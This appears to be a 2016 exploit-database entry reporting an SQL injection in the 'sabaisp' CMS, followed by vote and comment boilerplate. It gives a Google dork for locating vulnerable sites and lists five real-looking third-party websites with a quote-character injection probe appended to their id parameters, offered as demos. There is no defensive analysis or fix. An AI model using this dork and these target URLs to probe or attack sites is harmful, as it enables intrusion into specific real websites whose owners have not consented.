CMS sabaisp SQL Injection

2016.11.13
ir Bl4ck M4n (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------[+] |[+] Exploit Title: CMS sabaisp SQL Injection |[+] |[+] Exploit Author: Bl4ck M4n |[+] |[+] Sit: iedb.ir/ iedb.ir/acc xssed.ir |[+] |[+] Google Dork: intext:"طراحی و برنامه نویسی توسط شرکت صبا عصر دانش" inurl:php?id= |[+] |[+] |[+] Tested on: Windows 10 , Mozilla Firefox |[+] |[+] |------------------------------------------------------------[+] |[+] Demo: sql |[+] |[+] http://fssabaco.ir/products.php?id=21%27 |[+] http://pishgamanrahaee.ir/menu.php?id=7%27 |[+] http://www.sepahanhalabco.ir/products.php?id=42%27 |[+] http://goleseyed.ir/products.php?id=38%27 |[+} http://banianejavan.org/news.php?id=21%27 |----------------------------------------------------------[+] |[+] My Accounts :- |[+] |[+] ID:joker_s_hack_s@yahoo.com |[+] |[+] https://twitter.com/M4nBl4ck |[+]-------------------------------------------[+] |[+] Twitter : M4nBl4ck |[+] |[+] Tnks To : Amir |[+] |[+] Tnks To : All Member In Iedb.ir |[+] |[+] And All Member In Arbi AND Iranian |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top